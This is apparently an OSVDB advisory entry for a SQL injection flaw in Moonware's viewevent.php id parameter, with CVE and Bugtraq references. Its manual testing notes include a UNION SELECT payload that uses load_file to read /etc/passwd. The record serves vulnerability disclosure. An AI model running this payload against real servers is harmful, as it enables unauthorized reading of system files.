Moonware viewevent.php id Variable SQL Injection

2007-08-27T00:00:00
ID OSVDB:38438
Type osvdb
Reporter OSVDB
Modified 2007-08-27T00:00:00

Description

Manual Testing Notes

http://[target]/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*

References:

Keyword: Dale Mooney Gallery ISS X-Force ID: 36289 CVE-2007-4611 Bugtraq ID: 25456